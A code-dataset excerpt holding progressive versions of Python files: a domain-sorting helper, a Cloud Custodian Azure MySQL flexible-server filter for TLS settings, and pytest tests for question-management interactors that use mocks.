"step-5": "def domain_sort_key(domain):\n \"\"\"Key to sort hosts / domains alphabetically, by domain name.\"\"\"\n import re\n domain_expr = r'(.*\\.)?(.*\\.)(.*)' # Eg: (www.)(google.)(com)\n domain_search = re.search(domain_expr, domain)\n\n if domain_search and domain_search.group(1):\n # sort by domain name and then everything left of\n # Eg: google, com, www\n domain_values = (\n domain_search.group(2),\n domain_search.group(3),\n domain_search.group(1)\n )\n key = '%s%s%s' % domain_values\n else:\n # no host portion, just return the domain name\n key = domain\n return(key)\n\n\ndomains = ['www.google.com', 'cnn.com', 'mail.google.com', 'www.bing.com']\nprint('before: %s' % domains.__repr__())\ndomains.sort(key=domain_sort_key)\nprint('after: %s' % domains.__repr__())\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
@MySQLFlexibleServer.filter_registry.register('server-parameter')
class ServerParametersFilter(ValueFilter):
<|reserved_special_token_0|>
schema = type_schema('server-parameter', required=['type', 'name'],
rinherit=ValueFilter.schema, name={'type': 'string',
'allowed_value': ['TLSv1.2']})
def __call__(self, resource):
key = f"c7n:config-params:{self.data['name']}"
if key not in resource['properties']:
client = self.manager.get_client()
query = client.configurations.get(resource['resourceGroup'],
resource['name'], self.data['name'])
resource['properties'][key] = query.serialize(True).get(
'properties')
return super().__call__(resource['properties'].get(key))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@MySQLFlexibleServer.filter_registry.register('server-parameter')
class ServerParametersFilter(ValueFilter):
"""Filter by configuration parameter for mysql flexible server
:example:
Example JSON document showing the data format provided to the filter
.. code-block:: json
{
"value": "TLSv1.2"
"description": "Which protocols the server permits for encrypted
connections. By default, TLS 1.2 is enforced",
"defaultValue": "TLSv1.2",
"dataType": "Set",
"allowedValues": "TLSv1,TLSv1.1,TLSv1.2",
"source": "system-default",
"isReadOnly": "False",
"isConfigPendingRestart": "False",
"isDynamicConfig": "False",
}
:example:
Find Mysql Flexible servers with tls_version not set to TLSV1.2
.. code-block:: yaml
policies:
- name: mysql-flexible-server-tls-version
resource: azure.mysql-flexibleserver
filters:
- type: server-parameter
name: tls_version
key: value
op: eq
value: 'TLSv1.2'
"""
schema = type_schema('server-parameter', required=['type', 'name'],
rinherit=ValueFilter.schema, name={'type': 'string',
'allowed_value': ['TLSv1.2']})
def __call__(self, resource):
key = f"c7n:config-params:{self.data['name']}"
if key not in resource['properties']:
client = self.manager.get_client()
query = client.configurations.get(resource['resourceGroup'],
resource['name'], self.data['name'])
resource['properties'][key] = query.serialize(True).get(
'properties')
return super().__call__(resource['properties'].get(key))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@resources.register('mysql-flexibleserver')
class MySQLFlexibleServer(ArmResourceManager):
class resource_type(ArmResourceManager.resource_type):
doc_groups = ['Databases']
service = 'azure.mgmt.rdbms.mysql_flexibleservers'
client = 'MySQLManagementClient'
enum_spec = 'servers', 'list', None
default_report_fields = 'name', 'location', 'resourceGroup'
resource_type = 'Microsoft.DBForMySQL/flexibleservers/configurations'
@MySQLFlexibleServer.filter_registry.register('server-parameter')
class ServerParametersFilter(ValueFilter):
    """Filter MySQL flexible servers by a named configuration parameter.

    For each resource the named server parameter is fetched once from the
    Azure configurations API, cached on the resource under
    ``c7n:config-params:<name>``, and then matched with the standard
    ValueFilter semantics (``key`` / ``op`` / ``value``).

    Example JSON document provided to the value filter:

    .. code-block:: json

        {
            "value": "TLSv1.2",
            "description": "Which protocols the server permits for encrypted
             connections. By default, TLS 1.2 is enforced",
            "defaultValue": "TLSv1.2",
            "dataType": "Set",
            "allowedValues": "TLSv1,TLSv1.1,TLSv1.2",
            "source": "system-default",
            "isReadOnly": "False",
            "isConfigPendingRestart": "False",
            "isDynamicConfig": "False"
        }

    Example policy -- find servers whose tls_version is not TLSv1.2:

    .. code-block:: yaml

        policies:
          - name: mysql-flexible-server-tls-version
            resource: azure.mysql-flexibleserver
            filters:
              - type: server-parameter
                name: tls_version
                key: value
                op: eq
                value: 'TLSv1.2'
    """
    # 'name' selects which server parameter to fetch; remaining keys come
    # from ValueFilter via rinherit.  NOTE(review): 'allowed_value' is not a
    # JSON-Schema keyword, so schema validation silently ignores it -- and
    # restricting the parameter *name* to 'TLSv1.2' would contradict the
    # documented usage (name: tls_version).  Confirm intent.
    schema = type_schema('server-parameter', required=['type', 'name'],
        rinherit=ValueFilter.schema, name={'type': 'string',
        'allowed_value': ['TLSv1.2']})

    def __call__(self, resource):
        # Per-resource cache key so repeated evaluation (multiple policies,
        # re-runs) does not re-query the configurations API.
        key = f"c7n:config-params:{self.data['name']}"
        if key not in resource['properties']:
            client = self.manager.get_client()
            query = client.configurations.get(resource['resourceGroup'],
                resource['name'], self.data['name'])
            # Only the 'properties' sub-document of the SDK response is
            # retained; that is what the value filter matches against.
            resource['properties'][key] = query.serialize(True).get(
                'properties')
        return super().__call__(resource['properties'].get(key))
<|reserved_special_token_1|>
from c7n_azure.provider import resources
from c7n_azure.resources.arm import ArmResourceManager
from c7n.utils import type_schema
from c7n.filters.core import ValueFilter
@resources.register('mysql-flexibleserver')
class MySQLFlexibleServer(ArmResourceManager):
    """ARM resource manager for Azure Database for MySQL flexible servers."""

    class resource_type(ArmResourceManager.resource_type):
        # Section under which this resource appears in generated docs.
        doc_groups = ['Databases']
        # Azure SDK module and management client used for enumeration.
        service = 'azure.mgmt.rdbms.mysql_flexibleservers'
        client = 'MySQLManagementClient'
        # (operations-group, method, extra-args) tuple used to list resources.
        enum_spec = 'servers', 'list', None
        default_report_fields = 'name', 'location', 'resourceGroup'
        # NOTE(review): this ARM type ends in '/configurations'; for the
        # server resource itself 'Microsoft.DBForMySQL/flexibleservers'
        # would be expected -- confirm against the provider schema.
        resource_type = 'Microsoft.DBForMySQL/flexibleservers/configurations'
@MySQLFlexibleServer.filter_registry.register('server-parameter')
class ServerParametersFilter(ValueFilter):
    """Match MySQL flexible servers on one of their server parameters.

    The parameter named by ``name`` is retrieved from the Azure
    configurations API the first time the filter sees a resource, cached on
    the resource dict under ``c7n:config-params:<name>``, and evaluated with
    ordinary ValueFilter semantics (``key`` / ``op`` / ``value``).

    Example policy -- flag servers whose tls_version is not TLSv1.2:

    .. code-block:: yaml

        policies:
          - name: mysql-flexible-server-tls-version
            resource: azure.mysql-flexibleserver
            filters:
              - type: server-parameter
                name: tls_version
                key: value
                op: eq
                value: 'TLSv1.2'
    """

    schema = type_schema(
        'server-parameter',
        required=['type', 'name'],
        rinherit=ValueFilter.schema,
        name={'type': 'string', 'allowed_value': ['TLSv1.2']})

    def __call__(self, resource):
        """Fetch (once) and match the configured parameter for *resource*."""
        param_name = self.data['name']
        cache_key = 'c7n:config-params:' + param_name
        properties = resource['properties']
        if cache_key not in properties:
            api = self.manager.get_client()
            response = api.configurations.get(
                resource['resourceGroup'], resource['name'], param_name)
            # Keep only the 'properties' sub-document of the SDK response.
            properties[cache_key] = response.serialize(True).get('properties')
        return super().__call__(properties.get(cache_key))
<|reserved_special_token_1|>
# Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
from c7n_azure.provider import resources
from c7n_azure.resources.arm import ArmResourceManager
from c7n.utils import type_schema
from c7n.filters.core import ValueFilter
@resources.register('mysql-flexibleserver')
class MySQLFlexibleServer(ArmResourceManager):
    """ARM resource manager for Azure Database for MySQL flexible servers."""

    class resource_type(ArmResourceManager.resource_type):
        # Section under which this resource appears in generated docs.
        doc_groups = ['Databases']
        # Azure SDK module and management client used for enumeration.
        service = 'azure.mgmt.rdbms.mysql_flexibleservers'
        client = 'MySQLManagementClient'
        # (operations-group, method, extra-args) tuple used to list resources.
        enum_spec = ('servers', 'list', None)
        # Columns shown by default in report output.
        default_report_fields = (
            'name',
            'location',
            'resourceGroup'
        )
        # NOTE(review): this ARM type ends in '/configurations'; for the
        # server resource itself 'Microsoft.DBForMySQL/flexibleservers'
        # would be expected -- confirm against the provider schema.
        resource_type = 'Microsoft.DBForMySQL/flexibleservers/configurations'
@MySQLFlexibleServer.filter_registry.register('server-parameter')
class ServerParametersFilter(ValueFilter):
    """Filter MySQL flexible servers by a named configuration parameter.

    The named server parameter is fetched once per resource from the Azure
    configurations API, cached on the resource under
    ``c7n:config-params:<name>``, and matched with the standard ValueFilter
    semantics (``key`` / ``op`` / ``value``).

    :example:

    Example JSON document showing the data format provided to the filter

    .. code-block:: json

        {
            "value": "TLSv1.2",
            "description": "Which protocols the server permits for encrypted
             connections. By default, TLS 1.2 is enforced",
            "defaultValue": "TLSv1.2",
            "dataType": "Set",
            "allowedValues": "TLSv1,TLSv1.1,TLSv1.2",
            "source": "system-default",
            "isReadOnly": "False",
            "isConfigPendingRestart": "False",
            "isDynamicConfig": "False"
        }

    :example:

    Find Mysql Flexible servers with tls_version not set to TLSv1.2

    .. code-block:: yaml

        policies:
          - name: mysql-flexible-server-tls-version
            resource: azure.mysql-flexibleserver
            filters:
              - type: server-parameter
                name: tls_version
                key: value
                op: eq
                value: 'TLSv1.2'
    """

    # 'name' is the server parameter to inspect (e.g. tls_version); the
    # matching keys (key/op/value/...) are inherited from ValueFilter.
    # The former "'allowed_value': ['TLSv1.2']" entry was removed: it is not
    # a JSON-Schema keyword (validators silently ignore unknown keywords, so
    # it never validated anything), and constraining the parameter *name* to
    # 'TLSv1.2' contradicted the documented usage (name: tls_version).
    schema = type_schema(
        'server-parameter',
        required=['type', 'name'],
        rinherit=ValueFilter.schema,
        name={'type': 'string'},
    )

    def __call__(self, resource):
        """Match *resource* against the configured server parameter.

        Fetches the parameter's 'properties' document once and caches it on
        the resource so repeated evaluations do not re-query the API.
        """
        param_name = self.data['name']
        key = f'c7n:config-params:{param_name}'
        if key not in resource['properties']:
            client = self.manager.get_client()
            query = client.configurations.get(
                resource['resourceGroup'],
                resource['name'],
                param_name,
            )
            resource['properties'][key] = query.serialize(True).get('properties')
        return super().__call__(resource['properties'].get(key))
|
flexible
|
{
"blob_id": "b9bc6a9dbb3dbe51fbae45078bd499fb97fa003f",
"index": 3950,
"step-1": "<mask token>\n\n\n@MySQLFlexibleServer.filter_registry.register('server-parameter')\nclass ServerParametersFilter(ValueFilter):\n <mask token>\n schema = type_schema('server-parameter', required=['type', 'name'],\n rinherit=ValueFilter.schema, name={'type': 'string',\n 'allowed_value': ['TLSv1.2']})\n\n def __call__(self, resource):\n key = f\"c7n:config-params:{self.data['name']}\"\n if key not in resource['properties']:\n client = self.manager.get_client()\n query = client.configurations.get(resource['resourceGroup'],\n resource['name'], self.data['name'])\n resource['properties'][key] = query.serialize(True).get(\n 'properties')\n return super().__call__(resource['properties'].get(key))\n",
"step-2": "<mask token>\n\n\n@MySQLFlexibleServer.filter_registry.register('server-parameter')\nclass ServerParametersFilter(ValueFilter):\n \"\"\"Filter by configuration parameter for mysql flexible server\n\n :example:\n\n Example JSON document showing the data format provided to the filter\n\n .. code-block:: json\n\n {\n \"value\": \"TLSv1.2\"\n \"description\": \"Which protocols the server permits for encrypted\n connections. By default, TLS 1.2 is enforced\",\n \"defaultValue\": \"TLSv1.2\",\n \"dataType\": \"Set\",\n \"allowedValues\": \"TLSv1,TLSv1.1,TLSv1.2\",\n \"source\": \"system-default\",\n \"isReadOnly\": \"False\",\n \"isConfigPendingRestart\": \"False\",\n \"isDynamicConfig\": \"False\",\n }\n\n :example:\n\n Find Mysql Flexible servers with tls_version not set to TLSV1.2\n\n .. code-block:: yaml\n\n policies:\n - name: mysql-flexible-server-tls-version\n resource: azure.mysql-flexibleserver\n filters:\n - type: server-parameter\n name: tls_version\n key: value\n op: eq\n value: 'TLSv1.2'\n\n \"\"\"\n schema = type_schema('server-parameter', required=['type', 'name'],\n rinherit=ValueFilter.schema, name={'type': 'string',\n 'allowed_value': ['TLSv1.2']})\n\n def __call__(self, resource):\n key = f\"c7n:config-params:{self.data['name']}\"\n if key not in resource['properties']:\n client = self.manager.get_client()\n query = client.configurations.get(resource['resourceGroup'],\n resource['name'], self.data['name'])\n resource['properties'][key] = query.serialize(True).get(\n 'properties')\n return super().__call__(resource['properties'].get(key))\n",
"step-3": "<mask token>\n\n\n@resources.register('mysql-flexibleserver')\nclass MySQLFlexibleServer(ArmResourceManager):\n\n\n class resource_type(ArmResourceManager.resource_type):\n doc_groups = ['Databases']\n service = 'azure.mgmt.rdbms.mysql_flexibleservers'\n client = 'MySQLManagementClient'\n enum_spec = 'servers', 'list', None\n default_report_fields = 'name', 'location', 'resourceGroup'\n resource_type = 'Microsoft.DBForMySQL/flexibleservers/configurations'\n\n\n@MySQLFlexibleServer.filter_registry.register('server-parameter')\nclass ServerParametersFilter(ValueFilter):\n \"\"\"Filter by configuration parameter for mysql flexible server\n\n :example:\n\n Example JSON document showing the data format provided to the filter\n\n .. code-block:: json\n\n {\n \"value\": \"TLSv1.2\"\n \"description\": \"Which protocols the server permits for encrypted\n connections. By default, TLS 1.2 is enforced\",\n \"defaultValue\": \"TLSv1.2\",\n \"dataType\": \"Set\",\n \"allowedValues\": \"TLSv1,TLSv1.1,TLSv1.2\",\n \"source\": \"system-default\",\n \"isReadOnly\": \"False\",\n \"isConfigPendingRestart\": \"False\",\n \"isDynamicConfig\": \"False\",\n }\n\n :example:\n\n Find Mysql Flexible servers with tls_version not set to TLSV1.2\n\n .. 
code-block:: yaml\n\n policies:\n - name: mysql-flexible-server-tls-version\n resource: azure.mysql-flexibleserver\n filters:\n - type: server-parameter\n name: tls_version\n key: value\n op: eq\n value: 'TLSv1.2'\n\n \"\"\"\n schema = type_schema('server-parameter', required=['type', 'name'],\n rinherit=ValueFilter.schema, name={'type': 'string',\n 'allowed_value': ['TLSv1.2']})\n\n def __call__(self, resource):\n key = f\"c7n:config-params:{self.data['name']}\"\n if key not in resource['properties']:\n client = self.manager.get_client()\n query = client.configurations.get(resource['resourceGroup'],\n resource['name'], self.data['name'])\n resource['properties'][key] = query.serialize(True).get(\n 'properties')\n return super().__call__(resource['properties'].get(key))\n",
"step-4": "from c7n_azure.provider import resources\nfrom c7n_azure.resources.arm import ArmResourceManager\nfrom c7n.utils import type_schema\nfrom c7n.filters.core import ValueFilter\n\n\n@resources.register('mysql-flexibleserver')\nclass MySQLFlexibleServer(ArmResourceManager):\n\n\n class resource_type(ArmResourceManager.resource_type):\n doc_groups = ['Databases']\n service = 'azure.mgmt.rdbms.mysql_flexibleservers'\n client = 'MySQLManagementClient'\n enum_spec = 'servers', 'list', None\n default_report_fields = 'name', 'location', 'resourceGroup'\n resource_type = 'Microsoft.DBForMySQL/flexibleservers/configurations'\n\n\n@MySQLFlexibleServer.filter_registry.register('server-parameter')\nclass ServerParametersFilter(ValueFilter):\n \"\"\"Filter by configuration parameter for mysql flexible server\n\n :example:\n\n Example JSON document showing the data format provided to the filter\n\n .. code-block:: json\n\n {\n \"value\": \"TLSv1.2\"\n \"description\": \"Which protocols the server permits for encrypted\n connections. By default, TLS 1.2 is enforced\",\n \"defaultValue\": \"TLSv1.2\",\n \"dataType\": \"Set\",\n \"allowedValues\": \"TLSv1,TLSv1.1,TLSv1.2\",\n \"source\": \"system-default\",\n \"isReadOnly\": \"False\",\n \"isConfigPendingRestart\": \"False\",\n \"isDynamicConfig\": \"False\",\n }\n\n :example:\n\n Find Mysql Flexible servers with tls_version not set to TLSV1.2\n\n .. 
code-block:: yaml\n\n policies:\n - name: mysql-flexible-server-tls-version\n resource: azure.mysql-flexibleserver\n filters:\n - type: server-parameter\n name: tls_version\n key: value\n op: eq\n value: 'TLSv1.2'\n\n \"\"\"\n schema = type_schema('server-parameter', required=['type', 'name'],\n rinherit=ValueFilter.schema, name={'type': 'string',\n 'allowed_value': ['TLSv1.2']})\n\n def __call__(self, resource):\n key = f\"c7n:config-params:{self.data['name']}\"\n if key not in resource['properties']:\n client = self.manager.get_client()\n query = client.configurations.get(resource['resourceGroup'],\n resource['name'], self.data['name'])\n resource['properties'][key] = query.serialize(True).get(\n 'properties')\n return super().__call__(resource['properties'].get(key))\n",
"step-5": "# Copyright The Cloud Custodian Authors.\n# SPDX-License-Identifier: Apache-2.0\n\nfrom c7n_azure.provider import resources\nfrom c7n_azure.resources.arm import ArmResourceManager\nfrom c7n.utils import type_schema\nfrom c7n.filters.core import ValueFilter\n\n\n@resources.register('mysql-flexibleserver')\nclass MySQLFlexibleServer(ArmResourceManager):\n\n class resource_type(ArmResourceManager.resource_type):\n doc_groups = ['Databases']\n\n service = 'azure.mgmt.rdbms.mysql_flexibleservers'\n client = 'MySQLManagementClient'\n enum_spec = ('servers', 'list', None)\n default_report_fields = (\n 'name',\n 'location',\n 'resourceGroup'\n )\n resource_type = 'Microsoft.DBForMySQL/flexibleservers/configurations'\n\n\n@MySQLFlexibleServer.filter_registry.register('server-parameter')\nclass ServerParametersFilter(ValueFilter):\n \"\"\"Filter by configuration parameter for mysql flexible server\n\n :example:\n\n Example JSON document showing the data format provided to the filter\n\n .. code-block:: json\n\n {\n \"value\": \"TLSv1.2\"\n \"description\": \"Which protocols the server permits for encrypted\n connections. By default, TLS 1.2 is enforced\",\n \"defaultValue\": \"TLSv1.2\",\n \"dataType\": \"Set\",\n \"allowedValues\": \"TLSv1,TLSv1.1,TLSv1.2\",\n \"source\": \"system-default\",\n \"isReadOnly\": \"False\",\n \"isConfigPendingRestart\": \"False\",\n \"isDynamicConfig\": \"False\",\n }\n\n :example:\n\n Find Mysql Flexible servers with tls_version not set to TLSV1.2\n\n .. 
code-block:: yaml\n\n policies:\n - name: mysql-flexible-server-tls-version\n resource: azure.mysql-flexibleserver\n filters:\n - type: server-parameter\n name: tls_version\n key: value\n op: eq\n value: 'TLSv1.2'\n\n \"\"\"\n\n schema = type_schema(\n 'server-parameter',\n required=['type', 'name'],\n rinherit=ValueFilter.schema,\n name={\n 'type': 'string',\n 'allowed_value': ['TLSv1.2']\n },\n )\n\n def __call__(self, resource):\n key = f'c7n:config-params:{self.data[\"name\"]}'\n if key not in resource['properties']:\n client = self.manager.get_client()\n query = client.configurations.get(\n resource['resourceGroup'],\n resource['name'],\n self.data[\"name\"]\n )\n\n resource['properties'][key] = query.serialize(True).get('properties')\n\n return super().__call__(resource['properties'].get(key))\n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
class TestQuestionInteractor:
    def test_question_create(self, questiondto):
        """Creation delegates inputs to storage and renders via presenter."""
        # Arrange: concrete inputs plus autospec'd storage/presenter doubles.
        user_id = 1
        short_title = 'hello'
        content_type = 'HTML'
        content = 'hi'
        storage = create_autospec(StorageInterface)
        presenter = create_autospec(PresenterInterface)
        interactor = QuestionCreateInteractor(storage=storage, presenter=
            presenter)
        # Act
        interactor.question_creation(user_id=user_id, short_title=
            short_title, content_type=content_type, content=content)
        # Assert: storage got exactly one creation call with those inputs.
        storage.question_creation.assert_called_once_with(user_id=user_id,
            short_title=short_title, content_type=content_type, content=content
            )
        # NOTE(review): this line *calls* the presenter mock rather than
        # asserting on it; presumably an assert_called_* check was intended
        # -- confirm before changing.
        presenter.get_question_dto_response(questiondto=questiondto)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestQuestionInteractor:
    def test_question_create(self, questiondto):
        """Creation delegates inputs to storage and renders via presenter."""
        # Arrange: concrete inputs plus autospec'd storage/presenter doubles.
        user_id = 1
        short_title = 'hello'
        content_type = 'HTML'
        content = 'hi'
        storage = create_autospec(StorageInterface)
        presenter = create_autospec(PresenterInterface)
        interactor = QuestionCreateInteractor(storage=storage, presenter=
            presenter)
        # Act
        interactor.question_creation(user_id=user_id, short_title=
            short_title, content_type=content_type, content=content)
        # Assert: storage got exactly one creation call with those inputs.
        storage.question_creation.assert_called_once_with(user_id=user_id,
            short_title=short_title, content_type=content_type, content=content
            )
        # NOTE(review): this line *calls* the presenter mock rather than
        # asserting on it; presumably an assert_called_* check was intended
        # -- confirm before changing.
        presenter.get_question_dto_response(questiondto=questiondto)
<|reserved_special_token_0|>
def test_question_deletion(self):
question_id = 1
storage = create_autospec(StorageInterface)
interactor = QuestionDeletionInteractor(storage=storage)
interactor.question_deletion(question_id=question_id)
storage.question_deletion.assert_called_once_with(question_id=
question_id)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestQuestionInteractor:
    """Interactor tests for the question create / update / delete flows."""

    def test_question_create(self, questiondto):
        """Creation forwards the inputs to storage and renders the DTO."""
        storage_mock = create_autospec(StorageInterface)
        presenter_mock = create_autospec(PresenterInterface)
        create_interactor = QuestionCreateInteractor(
            storage=storage_mock, presenter=presenter_mock)

        create_interactor.question_creation(
            user_id=1, short_title='hello', content_type='HTML', content='hi')

        storage_mock.question_creation.assert_called_once_with(
            user_id=1, short_title='hello', content_type='HTML', content='hi')
        presenter_mock.get_question_dto_response(questiondto=questiondto)

    def test_question_update(self, questiondto):
        """Updation forwards the inputs plus question_id to storage."""
        storage_mock = create_autospec(StorageInterface)
        presenter_mock = create_autospec(PresenterInterface)
        update_interactor = QuestionUpdateInteractor(
            storage=storage_mock, presenter=presenter_mock)

        update_interactor.question_updation(
            user_id=1, short_title='hello', content_type='HTML',
            content='hi', question_id=1)

        storage_mock.question_updation.assert_called_once_with(
            user_id=1, short_title='hello', content_type='HTML',
            content='hi', question_id=1)
        presenter_mock.get_question_dto_response(questiondto=questiondto)

    def test_question_deletion(self):
        """Deletion forwards the question id to storage exactly once."""
        storage_mock = create_autospec(StorageInterface)
        deletion_interactor = QuestionDeletionInteractor(storage=storage_mock)

        deletion_interactor.question_deletion(question_id=1)

        storage_mock.question_deletion.assert_called_once_with(question_id=1)
<|reserved_special_token_1|>
import pytest
from django_swagger_utils.drf_server.exceptions import NotFound
from unittest.mock import create_autospec
from content_management_portal.constants.enums import TextType
from content_management_portal.interactors.storages.storage_interface import StorageInterface
from content_management_portal.interactors.presenters.question_presenter_interface import PresenterInterface
from content_management_portal.interactors.question_creation_interactor import QuestionCreateInteractor
from content_management_portal.interactors.question_updation_interactor import QuestionUpdateInteractor
from content_management_portal.interactors.question_deletion_interactor import QuestionDeletionInteractor
class TestQuestionInteractor:
    """Interactor tests for the question create / update / delete flows."""

    def test_question_create(self, questiondto):
        """Creation forwards the inputs to storage and renders the DTO."""
        # Arrange
        user_id = 1
        short_title = 'hello'
        content_type = 'HTML'
        content = 'hi'
        storage = create_autospec(StorageInterface)
        presenter = create_autospec(PresenterInterface)
        interactor = QuestionCreateInteractor(storage=storage, presenter=
            presenter)
        # Act
        interactor.question_creation(user_id=user_id, short_title=
            short_title, content_type=content_type, content=content)
        # Assert
        storage.question_creation.assert_called_once_with(user_id=user_id,
            short_title=short_title, content_type=content_type, content=content
            )
        # NOTE(review): this *calls* the presenter mock rather than asserting
        # on it; presumably an assert_called_* check was intended -- confirm.
        presenter.get_question_dto_response(questiondto=questiondto)

    def test_question_update(self, questiondto):
        """Updation forwards the inputs plus question_id to storage."""
        # Arrange
        user_id = 1
        question_id = 1
        short_title = 'hello'
        content_type = 'HTML'
        content = 'hi'
        storage = create_autospec(StorageInterface)
        presenter = create_autospec(PresenterInterface)
        interactor = QuestionUpdateInteractor(storage=storage, presenter=
            presenter)
        # Act
        interactor.question_updation(user_id=user_id, short_title=
            short_title, content_type=content_type, content=content,
            question_id=question_id)
        # Assert
        storage.question_updation.assert_called_once_with(user_id=user_id,
            short_title=short_title, content_type=content_type, content=
            content, question_id=question_id)
        # NOTE(review): same as above -- mock is called, not asserted on.
        presenter.get_question_dto_response(questiondto=questiondto)

    def test_question_deletion(self):
        """Deletion forwards the question id to storage exactly once."""
        # Arrange
        question_id = 1
        storage = create_autospec(StorageInterface)
        interactor = QuestionDeletionInteractor(storage=storage)
        # Act
        interactor.question_deletion(question_id=question_id)
        # Assert
        storage.question_deletion.assert_called_once_with(question_id=
            question_id)
<|reserved_special_token_1|>
import pytest
from django_swagger_utils.drf_server.exceptions import NotFound
from unittest.mock import create_autospec
from content_management_portal.constants.enums import TextType
from content_management_portal.interactors.storages.storage_interface \
import StorageInterface
from content_management_portal.interactors.presenters. \
question_presenter_interface import PresenterInterface
from content_management_portal.interactors.question_creation_interactor \
import QuestionCreateInteractor
from content_management_portal.interactors.question_updation_interactor \
import QuestionUpdateInteractor
from content_management_portal.interactors.question_deletion_interactor \
import QuestionDeletionInteractor
class TestQuestionInteractor:
    """Interactor tests for the question create / update / delete flows.

    Cleaned up to idiomatic PEP 8: backslash line continuations replaced by
    implicit continuation inside parentheses, spaces added around '=' and
    after commas, consistent Arrange/Act/Assert structure.  Behavior of every
    test is unchanged.
    """

    def test_question_create(self, questiondto):
        """Creation forwards the inputs to storage and renders the DTO."""
        # Arrange
        user_id = 1
        short_title = "hello"
        content_type = "HTML"
        content = "hi"
        storage = create_autospec(StorageInterface)
        presenter = create_autospec(PresenterInterface)
        interactor = QuestionCreateInteractor(storage=storage,
                                              presenter=presenter)

        # Act
        interactor.question_creation(user_id=user_id,
                                     short_title=short_title,
                                     content_type=content_type,
                                     content=content)

        # Assert
        storage.question_creation.assert_called_once_with(
            user_id=user_id,
            short_title=short_title,
            content_type=content_type,
            content=content,
        )
        # NOTE(review): this line *calls* the presenter mock rather than
        # asserting on it; presumably an assert_called_* check was intended
        # -- confirm before changing.
        presenter.get_question_dto_response(questiondto=questiondto)

    def test_question_update(self, questiondto):
        """Updation forwards the inputs plus question_id to storage."""
        # Arrange
        user_id = 1
        question_id = 1
        short_title = "hello"
        content_type = "HTML"
        content = "hi"
        storage = create_autospec(StorageInterface)
        presenter = create_autospec(PresenterInterface)
        interactor = QuestionUpdateInteractor(storage=storage,
                                              presenter=presenter)

        # Act
        interactor.question_updation(user_id=user_id,
                                     short_title=short_title,
                                     content_type=content_type,
                                     content=content,
                                     question_id=question_id)

        # Assert
        storage.question_updation.assert_called_once_with(
            user_id=user_id,
            short_title=short_title,
            content_type=content_type,
            content=content,
            question_id=question_id,
        )
        # NOTE(review): same as above -- mock is called, not asserted on.
        presenter.get_question_dto_response(questiondto=questiondto)

    def test_question_deletion(self):
        """Deletion forwards the question id to storage exactly once."""
        # Arrange
        question_id = 1
        storage = create_autospec(StorageInterface)
        interactor = QuestionDeletionInteractor(storage=storage)

        # Act
        interactor.question_deletion(question_id=question_id)

        # Assert
        storage.question_deletion.assert_called_once_with(
            question_id=question_id)
|
flexible
|
{
"blob_id": "1c66ccb80383feeee96b3fb492ff63be1a67a796",
"index": 5496,
"step-1": "<mask token>\n\n\nclass TestQuestionInteractor:\n\n def test_question_create(self, questiondto):\n user_id = 1\n short_title = 'hello'\n content_type = 'HTML'\n content = 'hi'\n storage = create_autospec(StorageInterface)\n presenter = create_autospec(PresenterInterface)\n interactor = QuestionCreateInteractor(storage=storage, presenter=\n presenter)\n interactor.question_creation(user_id=user_id, short_title=\n short_title, content_type=content_type, content=content)\n storage.question_creation.assert_called_once_with(user_id=user_id,\n short_title=short_title, content_type=content_type, content=content\n )\n presenter.get_question_dto_response(questiondto=questiondto)\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestQuestionInteractor:\n\n def test_question_create(self, questiondto):\n user_id = 1\n short_title = 'hello'\n content_type = 'HTML'\n content = 'hi'\n storage = create_autospec(StorageInterface)\n presenter = create_autospec(PresenterInterface)\n interactor = QuestionCreateInteractor(storage=storage, presenter=\n presenter)\n interactor.question_creation(user_id=user_id, short_title=\n short_title, content_type=content_type, content=content)\n storage.question_creation.assert_called_once_with(user_id=user_id,\n short_title=short_title, content_type=content_type, content=content\n )\n presenter.get_question_dto_response(questiondto=questiondto)\n <mask token>\n\n def test_question_deletion(self):\n question_id = 1\n storage = create_autospec(StorageInterface)\n interactor = QuestionDeletionInteractor(storage=storage)\n interactor.question_deletion(question_id=question_id)\n storage.question_deletion.assert_called_once_with(question_id=\n question_id)\n",
"step-3": "<mask token>\n\n\nclass TestQuestionInteractor:\n\n def test_question_create(self, questiondto):\n user_id = 1\n short_title = 'hello'\n content_type = 'HTML'\n content = 'hi'\n storage = create_autospec(StorageInterface)\n presenter = create_autospec(PresenterInterface)\n interactor = QuestionCreateInteractor(storage=storage, presenter=\n presenter)\n interactor.question_creation(user_id=user_id, short_title=\n short_title, content_type=content_type, content=content)\n storage.question_creation.assert_called_once_with(user_id=user_id,\n short_title=short_title, content_type=content_type, content=content\n )\n presenter.get_question_dto_response(questiondto=questiondto)\n\n def test_question_update(self, questiondto):\n user_id = 1\n question_id = 1\n short_title = 'hello'\n content_type = 'HTML'\n content = 'hi'\n storage = create_autospec(StorageInterface)\n presenter = create_autospec(PresenterInterface)\n interactor = QuestionUpdateInteractor(storage=storage, presenter=\n presenter)\n interactor.question_updation(user_id=user_id, short_title=\n short_title, content_type=content_type, content=content,\n question_id=question_id)\n storage.question_updation.assert_called_once_with(user_id=user_id,\n short_title=short_title, content_type=content_type, content=\n content, question_id=question_id)\n presenter.get_question_dto_response(questiondto=questiondto)\n\n def test_question_deletion(self):\n question_id = 1\n storage = create_autospec(StorageInterface)\n interactor = QuestionDeletionInteractor(storage=storage)\n interactor.question_deletion(question_id=question_id)\n storage.question_deletion.assert_called_once_with(question_id=\n question_id)\n",
